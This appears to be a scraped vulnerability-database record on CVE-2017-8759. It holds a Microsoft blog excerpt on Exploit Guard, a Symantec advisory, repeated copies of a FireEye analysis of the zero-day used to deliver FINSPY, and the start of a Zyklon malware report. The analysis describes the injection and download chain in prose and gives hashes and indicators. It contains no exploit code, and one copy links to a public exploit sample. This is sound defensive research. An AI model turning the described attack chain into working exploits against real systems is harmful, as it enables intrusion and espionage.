the outbound call is to phishing, socially engineered malware, or a C&C website, or if the call originates from a browser or a background process, network protection can intercept and kill the connection. These filtering capabilities can also augment and work in concert with similar protection capabilities from others security solutions, browsers, etc.\n\n## Controlled folder access\n\nEncryption of files by ransomware and other unauthorized apps means losing control of your data: documents, precious photos and videos, and other important files. For enterprises and small businesses, losing access to files can mean disrupted operations. [Controlled folder access](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/stopping-ransomware-where-it-counts-protecting-your-data-with-controlled-folder-access?ocid=cx-blog-mmpc>) protects files by locking down critical folders, allowing only authorized apps to access files. Unauthorized apps, including malicious and suspicious executable files, DLLs, scripts, and others will be denied access even when they are running with the user's or administrator's privilege, which malware is often be able to secure.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/10/windows-defender-exploit-guard-4-2.png>)\n\nBy default, Controlled folder access protects common folders where documents and other important data are stored, but it\u2019s also flexible. You can add additional folders to protect, including those on other drives. You can also allow apps that you trust to access protected folders, so if you\u2019re using unique or custom app, your normal everyday productivity will be not affected.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/10/windows-defender-exploit-guard-5-2.png>)\n\nWhen enabled, controlled folder access blocks unauthorized access and notifies the user of any attempt by unauthorized apps to access or modify files in protected folders. It delivers this protection in real-time.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/10/windows-defender-exploit-guard-6-2.png>)\n\n## Exploit Protection** **\n\nWindows Defender Exploit Guard\u2019s exploit protection represents the suite of vulnerability mitigation and hardening techniques that are built directly into Windows 10. As you install the Fall Creators Update, the appropriate mitigation settings will already be configured and applied on the machine.** **\n\n### Rest In Peace (RIP) EMET\n\nUsers of the Enhanced Mitigation Experience Toolkit (EMET) will notice that it was automatically uninstalled from your machine during the upgrade. This is because WDEG includes the best of EMET built directly into Windows 10, so it\u2019s now just part of the platform. You can the find previous user experiences for configuring EMET vulnerability mitigation capabilities in Windows Defender Security Center. For more information, read [Moving Beyond Emet II - Windows-Defender-Exploit-Guard](<https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard?ocid=cx-blog-mmpc>).\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/10/windows-defender-exploit-guard-7-2.png>)\n\n_Figure shows using the Windows Security Center Exploit Protection control to enable mitigation Address Filtering (EAF) to unpatched application Word 2007_\n\nIt is important to note that Exploit Guard\u2019s exploit protection accepts a different format for the mitigation configuration than EMET did. To make the process of migrating to Exploit Protection and Windows Defender Exploit Guard easier, there is a PowerShell module that converts EMET XML settings files into Windows 10 mitigation policies for Exploit Guard. This PowerShell module also provides an additional interface for Windows Defender Security Center to configure its mitigation settings.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/10/windows-defender-exploit-guard-8-2.png>)\n\nMore information about this PowerShell module, and details on the EMET features relative to security in Windows 10 can be found in the topic [Understanding Windows 10 in relation to the Enhanced Mitigation Experience Toolkit](<https://docs.microsoft.com/en-us/windows/threat-protection/overview-of-threat-mitigations-in-windows-10#understanding-windows-10-in-relation-to-the-enhanced-mitigation-experience-toolkit?ocid=cx-blog-mmpc>). For more details on Windows 10\u2019s threat mitigations, please refer to our [Windows 10 Threat Mitigations](<https://docs.microsoft.com/en-us/windows/threat-protection/overview-of-threat-mitigations-in-windows-10?ocid=cx-blog-mmpc>). Finally, the Windows 10 Security [baseline](<https://blogs.technet.microsoft.com/secguide/2017/09/27/security-baseline-for-windows-10-fall-creators-update-v1709-draft/>) provides a recommended Exploit Protection XML to apply.\n\n## Windows Defender Exploit Guard manageability\n\nAll the Windows Defender Exploit Guard components are manageable by Group Policy (GP), System Center Configuration Manager (SCCM), and Mobile Device Management (MDM) such as Microsoft Intune.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/10/windows-defender-exploit-guard-9-2.png>)\n\nAll components support running in both Audit and Block modes. When Block mode is enabled and a corresponding malicious behavior is observed, Windows Defender Exploit Guard blocks the event from occurring in real-time. Block events for Attack Surface Reduction, Controlled folder access and Network Protection surface a notification toast to the endpoint in real-time as well as an event log, and can be centrally viewed by security operations personnel in the Windows Defender Advanced Threat Protection (WD ATP) console. Instead of actually blocking the behavior, Audit Mode detects if an event would have occurred and surfaces that information to the event log and WD ATP console. This enables enterprises to evaluate how a rule or feature within Windows Defender Exploit Guard will perform in their enterprise and determine if there are exclusions that are needed to setup. Additionally, Audit mode provides an immense amount of optics into what kinds of behaviors are going on across the enterprise, providing valuable information to security admins to determine if a rule needs to be moved to block mode.\n\n## Windows Defender Advanced Threat Protection\n\n[Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>) provides a single pane of glass experience for managing and viewing all the security feeds and events happening on managed endpoints across the enterprise. With Windows Defender ATP, the entire process tree execution can be seen for Exploit Guard events, making it extremely easy to determine what happened, such that a proper response can be executed. In the figure below you can see an example of how a malicious document in Word was used to drop an executable, which was then blocked when it attempted to access the _C:\\Demo_ folder.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/10/windows-defender-exploit-guard-10-2.png>)\n\n_Controlled folder access blocking sample ransomware_\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/10/windows-defender-exploit-guard-11-2.png>)\n\n_Network Protection blocking phishing test via Chrome browser_\n\nExploit Guard is also surfaced in the Security Analytics dashboard of the Windows Defender ATP console, enabling enterprises to view how the feature is configured across their device and to drive compliance with recommendations based on best practice security configurations.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/10/windows-defender-exploit-guard-12-2.png>)\n\nIn the end, Windows Defender Exploit Guard is one of the most important new defenses that we\u2019ve added to Windows 10 in the Fall Creators Update. In many ways, it completes our stack for preventive protection. Organizations that deploy it alongside Windows Defender Antivirus will find that they have a highly effective and differentiated solution for addressing modern fileless attacks and host intrusion. We recommend you evaluate it at the earliest opportunity and we look forward to your feedback.\n\n** **\n\n_**Misha Kutsovsky (@mkutsovsky)**_\n\n_Program Manager, Windows Active Defense_\n\n \n\n### Learn more about Windows 10 Fall Creators Update\n\n[Microsoft 365 Security and Management Features Available in Fall Creators Update](<https://blogs.windows.com/business/2017/10/23/microsoft-365-security-management-features-available-windows-10-fall-creators-update?ocid=cx-blog-mmpc>)[](<https://blogs.windows.com/business/?p=7645?ocid=cx-blog-mmpc>)\n\n[Windows Defender Exploit Guard: Reduce the attack surface against next-generation malware](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/?ocid=cx-blog-mmpc>)[](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reducing-the-attack-surface-with-next-generation-host-intrusion-prevention?ocid=cx-blog-mmpc>)\n\n[Stopping ransomware where it counts: Protecting your data with Controlled folder access ](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/stopping-ransomware-where-it-counts-protecting-your-data-with-controlled-folder-access?ocid=cx-blog-mmpc>)\n\n[Making Microsoft Edge the most secure browser with Windows Defender Application Guard](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/making-microsoft-edge-the-most-secure-browser-with-windows-defender-application-guard?ocid=cx-blog-mmpc>)\n\n[Introducing Windows Defender Application Control](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/introducing-windows-defender-application-control?ocid=cx-blog-mmpc>)\n\n[Hardening the system and maintaining integrity with Windows Defender System Guard ](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/hardening-the-system-and-maintaining-integrity-with-windows-defender-system-guard?ocid=cx-blog-mmpc>)\n\n[Move away from passwords, deploy Windows Hello. Today! ](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/move-away-from-passwords-deploy-windows-hello-today?ocid=cx-blog-mmpc>)\n\n[What\u2019s new in Windows Defender ATP Fall Creators Update](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/whats-new-in-windows-defender-atp-fall-creators-update?ocid=cx-blog-mmpc>)\n\n[Antivirus evolved](<https://blogs.technet.microsoft.com/mmpc/2017/05/08/antivirus-evolved?ocid=cx-blog-mmpc>)\n\n \n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>).\n\nFollow us on Twitter [@MMPC](<https://twitter.com/msftmmpc>) and Facebook [Microsoft Malware Protection Center](<https://www.facebook.com/msftmmpc/>)", "modified": "2017-10-23T13:05:08", "published": "2017-10-23T13:05:08", "href": "https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", "id": "MMPC:C13F25080AC9B1B34AF77630B988E9E8", "type": "mmpc", "title": "Windows Defender Exploit Guard: Reduce the attack surface against next-generation malware", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "symantec": [{"lastseen": "2018-03-13T06:16:56", "bulletinFamily": "software", "cvelist": ["CVE-2017-8759"], "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successfully exploiting this issue may allow attackers to execute arbitrary code in the context of the application. Failed exploit attempts will result in denial-of-service conditions.\n\n### Technologies Affected\n\n * Microsoft .NET Framework 2.0 SP2 \n * Microsoft .NET Framework 3.5 \n * Microsoft .NET Framework 3.5.1 \n * Microsoft .NET Framework 4.5.2 \n * Microsoft .NET Framework 4.6 \n * Microsoft .NET Framework 4.6.1 \n * Microsoft .NET Framework 4.6.2 \n * Microsoft .NET Framework 4.7 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-09-12T00:00:00", "published": "2017-09-12T00:00:00", "id": "SMNTC-100742", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/100742", "type": "symantec", "title": "Microsoft Windows .NET Framework CVE-2017-8759 Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T12:04:10", "description": "FireEye recently detected a malicious Microsoft Office RTF document that leveraged CVE-2017-8759, a SOAP WSDL parser code injection vulnerability. This vulnerability allows a malicious actor to inject arbitrary code during the parsing of SOAP WSDL definition contents. FireEye analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands.\r\n\r\nFireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch to address the vulnerability and security guidance, which can be found here.\r\n\r\nFireEye email, endpoint and network products detected the malicious documents.\r\n\r\n### Vulnerability Used to Target Russian Speakers\r\n\r\nThe malicious document, \u201c\u041f\u0440\u043e\u0435\u043a\u0442.doc\u201d (MD5: fe5c4d6bb78e170abf5cf3741868ea4c), might have been used to target a Russian speaker. Upon successful exploitation of CVE-2017-8759, the document downloads multiple components (details follow), and eventually launches a FINSPY payload (MD5: a7b990d5f57b244dd17e9a937a41e7f5).\r\n\r\nFINSPY malware, also reported as FinFisher or WingBird, is available for purchase as part of a \u201clawful intercept\u201d capability. Based on this and previous use of FINSPY, we assess with moderate confidence that this malicious document was used by a nation-state to target a Russian-speaking entity for cyber espionage purposes. Additional detections by FireEye\u2019s Dynamic Threat Intelligence system indicates that related activity, though potentially for a different client, might have occurred as early as July 2017.\r\n\r\n### CVE-2017-8759 WSDL Parser Code Injection\r\n\r\nA code injection vulnerability exists in the WSDL parser module within the PrintClientProxy method (http://referencesource.microsoft.com/ - System.Runtime.Remoting/metadata/wsdlparser.cs,6111). The IsValidUrl does not perform correct validation if provided data that contains a CRLF sequence. This allows an attacker to inject and execute arbitrary code. A portion of the vulnerable code is shown in Figure 1.\r\n\r\n\r\nFigure 1: Vulnerable WSDL Parser\r\n\r\nWhen multiple address definitions are provided in a SOAP response, the code inserts the \u201c//base.ConfigureProxy(this.GetType(),\u201d string after the first address, commenting out the remaining addresses. However, if a CRLF sequence is in the additional addresses, the code following the CRLF will not be commented out. Figure 2 shows that due to lack validation of CRLF, a System.Diagnostics.Process.Start method call is injected. The generated code will be compiled by csc.exe of .NET framework, and loaded by the Office executables as a DLL.\r\n\r\n\r\nFigure 2: SOAP definition VS Generated code\r\n\r\n### The In-the-Wild Attacks\r\n\r\nThe attacks that FireEye observed in the wild leveraged a Rich Text Format (RTF) document, similar to the CVE-2017-0199 documents we previously reported on. The malicious sampled contained an embedded SOAP monikers to facilitate exploitation (Figure 3).\r\n\r\n\r\nFigure 3: SOAP Moniker\r\n\r\nThe payload retrieves the malicious SOAP WSDL definition from an attacker-controlled server. The WSDL parser, implemented in System.Runtime.Remoting.ni.dll of .NET framework, parses the content and generates a .cs source code at the working directory. The csc.exe of .NET framework then compiles the generated source code into a library, namely http[url path].dll. Microsoft Office then loads the library, completing the exploitation stage. Figure 4 shows an example library loaded as a result of exploitation.\r\n\r\n\r\nFigure 4: DLL loaded\r\n\r\nUpon successful exploitation, the injected code creates a new process and leverages mshta.exe to retrieve a HTA script named \u201cword.db\u201d from the same server. The HTA script removes the source code, compiled DLL and the PDB files from disk and then downloads and executes the FINSPY malware named \u201cleft.jpg,\u201d which in spite of the .jpg extension and \u201cimage/jpeg\u201d content-type, is actually an executable. Figure 5 shows the details of the PCAP of this malware transfer.\r\n\r\n\r\nFigure 5: Live requests\r\n\r\nThe malware will be placed at %appdata%\\Microsoft\\Windows\\OfficeUpdte-KB[ 6 random numbers ].exe. Figure 6 shows the process create chain under Process Monitor.\r\n\r\n\r\nFigure 6: Process Created Chain\r\n\r\n### The Malware\r\n\r\nThe \u201cleft.jpg\u201d (md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant of FINSPY. It leverages heavily obfuscated code that employs a built-in virtual machine \u2013 among other anti-analysis techniques \u2013 to make reversing more difficult. As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames. This variant runs with a mutex of \"WininetStartupMutex0\".\r\n\r\n### Conclusion\r\n\r\nCVE-2017-8759 is the second zero-day vulnerability used to distribute FINSPY uncovered by FireEye in 2017. These exposures demonstrate the significant resources available to \u201clawful intercept\u201d companies and their customers. Furthermore, FINSPY has been sold to multiple clients, suggesting the vulnerability was being used against other targets.\r\n\r\nIt is possible that CVE-2017-8759 was being used by additional actors. While we have not found evidence of this, the zero day being used to distribute FINSPY in April 2017, CVE-2017-0199 was simultaneously being used by a financially motivated actor. If the actors behind FINSPY obtained this vulnerability from the same source used previously, it is possible that source sold it to additional actors.", "published": "2017-09-14T00:00:00", "type": "seebug", "title": "FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-0199", "CVE-2017-8759"], "modified": "2017-09-14T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96484", "id": "SSV:96484", "sourceData": "\n https://github.com/Voulnet/CVE-2017-8759-Exploit-sample\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-96484"}], "fireeye": [{"lastseen": "2017-10-11T08:32:49", "bulletinFamily": "info", "cvelist": ["CVE-2017-0199", "CVE-2017-8759"], "description": "FireEye recently detected a malicious Microsoft Office RTF document that leveraged [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8759>), a SOAP [WSDL](<https://msdn.microsoft.com/en-us/library/ms996486.aspx>) parser code injection vulnerability. This vulnerability allows a malicious actor to inject arbitrary code during the parsing of SOAP WSDL definition contents. FireEye analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands.\n\nFireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch to address the vulnerability and security guidance, which can be found [here](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8759>).\n\nFireEye email, endpoint and network products detected the malicious documents.\n\n#### Vulnerability Used to Target Russian Speakers\n\nThe malicious document, \u201c\u041f\u0440\u043e\u0435\u043a\u0442.doc\u201d (MD5: fe5c4d6bb78e170abf5cf3741868ea4c), might have been used to target a Russian speaker. Upon successful exploitation of CVE-2017-8759, the document downloads multiple components (details follow), and eventually launches a FINSPY payload (MD5: a7b990d5f57b244dd17e9a937a41e7f5).\n\nFINSPY malware, also reported as FinFisher or [WingBird](<http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf>), is available for purchase as part of a \u201clawful intercept\u201d capability. Based on this and previous use of [FINSPY](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html>), we assess with moderate confidence that this malicious document was used by a nation-state to target a Russian-speaking entity for cyber espionage purposes. Additional detections by FireEye\u2019s Dynamic Threat Intelligence system indicates that related activity, though potentially for a different client, might have occurred as early as July 2017.\n\n#### CVE-2017-8759 WSDL Parser Code Injection\n\nA code injection vulnerability exists in the WSDL parser module within the PrintClientProxy method ([http://referencesource.microsoft.com/ - System.Runtime.Remoting/metadata/wsdlparser.cs,6111](<http://referencesource.microsoft.com/#System.Runtime.Remoting/metadata/wsdlparser.cs,6111>)). The IsValidUrl does not perform correct validation if provided data that contains a CRLF sequence. This allows an attacker to inject and execute arbitrary code. A portion of the vulnerable code is shown in Figure 1.\n\n \nFigure 1: Vulnerable WSDL Parser\n\nWhen multiple _address_ definitions are provided in a SOAP response, the code inserts the \u201c//base.ConfigureProxy(this.GetType(),\u201d string after the first address, commenting out the remaining addresses. However, if a CRLF sequence is in the additional addresses, the code following the CRLF will not be commented out. Figure 2 shows that due to lack validation of CRLF, a System.Diagnostics.Process.Start method call is injected. The generated code will be compiled by csc.exe of .NET framework, and loaded by the Office executables as a DLL.\n\n \nFigure 2: SOAP definition VS Generated code\n\n#### The In-the-Wild Attacks\n\nThe attacks that FireEye observed in the wild leveraged a Rich Text Format (RTF) document, similar to the [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) documents we previously reported on. The malicious sampled contained an embedded SOAP monikers to facilitate exploitation (Figure 3).\n\n \nFigure 3: SOAP Moniker\n\nThe payload retrieves the malicious SOAP WSDL definition from an attacker-controlled server. The WSDL parser, implemented in System.Runtime.Remoting.ni.dll of .NET framework, parses the content and generates a .cs source code at the working directory. The csc.exe of .NET framework then compiles the generated source code into a library, namely http[url path].dll. Microsoft Office then loads the library, completing the exploitation stage. Figure 4 shows an example library loaded as a result of exploitation.\n\n \nFigure 4: DLL loaded\n\nUpon successful exploitation, the injected code creates a new process and leverages mshta.exe to retrieve a HTA script named \u201cword.db\u201d from the same server. The HTA script removes the source code, compiled DLL and the PDB files from disk and then downloads and executes the FINSPY malware named \u201cleft.jpg,\u201d which in spite of the .jpg extension and \u201cimage/jpeg\u201d content-type, is actually an executable. Figure 5 shows the details of the PCAP of this malware transfer.\n\n \nFigure 5: Live requests\n\nThe malware will be placed at %appdata%\\Microsoft\\Windows\\OfficeUpdte-KB[ 6 random numbers ].exe. Figure 6 shows the process create chain under Process Monitor.\n\n \nFigure 6: Process Created Chain\n\n#### The Malware\n\nThe \u201cleft.jpg\u201d (md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant of FINSPY. It leverages heavily obfuscated code that employs a built-in virtual machine \u2013 among other anti-analysis techniques \u2013 to make reversing more difficult. As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames. This variant runs with a mutex of \"WininetStartupMutex0\".\n\n#### Conclusion\n\nCVE-2017-8759 is the second zero-day vulnerability used to distribute FINSPY uncovered by FireEye in 2017. These exposures demonstrate the significant resources available to \u201clawful intercept\u201d companies and their customers. Furthermore, FINSPY has been sold to multiple clients, suggesting the vulnerability was being used against other targets.\n\nIt is possible that CVE-2017-8759 was being used by additional actors. While we have not found evidence of this, the zero day being used to distribute FINSPY in April 2017, CVE-2017-0199 was simultaneously being used by a financially motivated actor. If the actors behind FINSPY obtained this vulnerability from the same source used previously, it is possible that source sold it to additional actors.\n\n#### Acknowledgement\n\nThank you to Dhanesh Kizhakkinan, Joseph Reyes, FireEye Labs Team, FireEye FLARE Team and FireEye iSIGHT Intelligence for their contributions to this blog. We also thank everyone from the Microsoft Security Response Center (MSRC) who worked with us on this issue.\n", "modified": "2017-09-12T13:00:00", "published": "2017-09-12T13:00:00", "id": "FIREEYE:A19A2394490AB386D95215A17EEA2FC0", "href": "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", "type": "fireeye", "title": "FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-08T00:43:24", "bulletinFamily": "info", "cvelist": ["CVE-2017-0199", "CVE-2017-8759"], "description": "FireEye recently detected a malicious Microsoft Office RTF document that leveraged [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8759>), a SOAP [WSDL](<https://msdn.microsoft.com/en-us/library/ms996486.aspx>) parser code injection vulnerability. This vulnerability allows a malicious actor to inject arbitrary code during the parsing of SOAP WSDL definition contents. FireEye analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands.\n\nFireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch to address the vulnerability and security guidance, which can be found [here](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8759>).\n\nFireEye email, endpoint and network products detected the malicious documents.\n\n#### Vulnerability Used to Target Russian Speakers\n\nThe malicious document, \u201c\u041f\u0440\u043e\u0435\u043a\u0442.doc\u201d (MD5: fe5c4d6bb78e170abf5cf3741868ea4c), might have been used to target a Russian speaker. Upon successful exploitation of CVE-2017-8759, the document downloads multiple components (details follow), and eventually launches a FINSPY payload (MD5: a7b990d5f57b244dd17e9a937a41e7f5).\n\nFINSPY malware, also reported as FinFisher or [WingBird](<http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf>), is available for purchase as part of a \u201clawful intercept\u201d capability. Based on this and previous use of [FINSPY](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html>), we assess with moderate confidence that this malicious document was used by a nation-state to target a Russian-speaking entity for cyber espionage purposes. Additional detections by FireEye\u2019s Dynamic Threat Intelligence system indicates that related activity, though potentially for a different client, might have occurred as early as July 2017.\n\n#### CVE-2017-8759 WSDL Parser Code Injection\n\nA code injection vulnerability exists in the WSDL parser module within the PrintClientProxy method ([http://referencesource.microsoft.com/ - System.Runtime.Remoting/metadata/wsdlparser.cs,6111](<http://referencesource.microsoft.com/#System.Runtime.Remoting/metadata/wsdlparser.cs,6111>)). The IsValidUrl does not perform correct validation if provided data that contains a CRLF sequence. This allows an attacker to inject and execute arbitrary code. A portion of the vulnerable code is shown in Figure 1.\n\n \nFigure 1: Vulnerable WSDL Parser\n\nWhen multiple _address_ definitions are provided in a SOAP response, the code inserts the \u201c//base.ConfigureProxy(this.GetType(),\u201d string after the first address, commenting out the remaining addresses. However, if a CRLF sequence is in the additional addresses, the code following the CRLF will not be commented out. Figure 2 shows that due to lack validation of CRLF, a System.Diagnostics.Process.Start method call is injected. The generated code will be compiled by csc.exe of .NET framework, and loaded by the Office executables as a DLL.\n\n \nFigure 2: SOAP definition VS Generated code\n\n#### The In-the-Wild Attacks\n\nThe attacks that FireEye observed in the wild leveraged a Rich Text Format (RTF) document, similar to the [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) documents we previously reported on. The malicious sampled contained an embedded SOAP monikers to facilitate exploitation (Figure 3).\n\n \nFigure 3: SOAP Moniker\n\nThe payload retrieves the malicious SOAP WSDL definition from an attacker-controlled server. The WSDL parser, implemented in System.Runtime.Remoting.ni.dll of .NET framework, parses the content and generates a .cs source code at the working directory. The csc.exe of .NET framework then compiles the generated source code into a library, namely http[url path].dll. Microsoft Office then loads the library, completing the exploitation stage. Figure 4 shows an example library loaded as a result of exploitation.\n\n \nFigure 4: DLL loaded\n\nUpon successful exploitation, the injected code creates a new process and leverages mshta.exe to retrieve a HTA script named \u201cword.db\u201d from the same server. The HTA script removes the source code, compiled DLL and the PDB files from disk and then downloads and executes the FINSPY malware named \u201cleft.jpg,\u201d which in spite of the .jpg extension and \u201cimage/jpeg\u201d content-type, is actually an executable. Figure 5 shows the details of the PCAP of this malware transfer.\n\n \nFigure 5: Live requests\n\nThe malware will be placed at %appdata%\\Microsoft\\Windows\\OfficeUpdte-KB[ 6 random numbers ].exe. Figure 6 shows the process create chain under Process Monitor.\n\n \nFigure 6: Process Created Chain\n\n#### The Malware\n\nThe \u201cleft.jpg\u201d (md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant of FINSPY. It leverages heavily obfuscated code that employs a built-in virtual machine \u2013 among other anti-analysis techniques \u2013 to make reversing more difficult. As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames. This variant runs with a mutex of \"WininetStartupMutex0\".\n\n#### Conclusion\n\nCVE-2017-8759 is the second zero-day vulnerability used to distribute FINSPY uncovered by FireEye in 2017. These exposures demonstrate the significant resources available to \u201clawful intercept\u201d companies and their customers. Furthermore, FINSPY has been sold to multiple clients, suggesting the vulnerability was being used against other targets.\n\nIt is possible that CVE-2017-8759 was being used by additional actors. While we have not found evidence of this, the zero day being used to distribute FINSPY in April 2017, CVE-2017-0199 was simultaneously being used by a financially motivated actor. If the actors behind FINSPY obtained this vulnerability from the same source used previously, it is possible that source sold it to additional actors.\n\n#### Acknowledgement\n\nThank you to Dhanesh Kizhakkinan, Joseph Reyes, FireEye Labs Team, FireEye FLARE Team and [FireEye iSIGHT Intelligence](<https://www.fireeye.com/solutions/isight-cyber-threat-intelligence-subscriptions.html>) for their contributions to this blog. We also thank everyone from the Microsoft Security Response Center (MSRC) who worked with us on this issue.\n", "modified": "2017-09-12T13:00:00", "published": "2017-09-12T13:00:00", "id": "FIREEYE:E28F2F7E1B1F4BDA33635C841E315BCA", "href": "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", "type": "fireeye", "title": "FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:21", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2017-8759"], "description": "#### Introduction\n\nFireEye researchers recently observed threat actors leveraging relatively new vulnerabilities in Microsoft Office to spread Zyklon HTTP malware. Zyklon has been observed in the wild since early 2016 and provides myriad sophisticated capabilities.\n\nZyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal. The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so. The malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery, from browsers and email software. Zyklon also provides a very efficient mechanism to monitor the spread and impact.\n\n#### Infection Vector\n\nWe have observed this recent wave of Zyklon malware being delivered primarily through spam emails. The email typically arrives with an attached ZIP file containing a malicious DOC file (Figure 1 shows a sample lure).\n\nThe following industries have been the primary targets in this campaign:\n\n * Telecommunications\n * Insurance\n * Financial Services\n\n \nFigure 1: Sample lure documents\n\n#### Attack Flow\n\n 1. Spam email arrives in the victim\u2019s mailbox as a ZIP attachment, which contains a malicious DOC file.\n 2. The document files exploit at least three known vulnerabilities in Microsoft Office, which we discuss in the Infection Techniques section. Upon execution in a vulnerable environment, the PowerShell based payload takes over.\n 3. The PowerShell script is responsible for downloading the final payload from C2 server to execute it.\n\nA visual representation of the attack flow and execution chain can be seen in Figure 2.\n\n \nFigure 2: Zyklon attack flow\n\n#### Infection Techniques\n\n##### CVE-2017-8759\n\nThis vulnerability was [discovered by FireEye](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) in September 2017, and it is a vulnerability we have observed being exploited in the wild.\n\nThe DOC file contains an embedded OLE Object that, upon execution, triggers the download of an additional DOC file from the stored URL (seen in Figure 3).\n\n \nFigure 3: Embedded URL in OLE object\n\n##### CVE-2017-11882\n\nSimilarly, we have also observed actors leveraging another recently 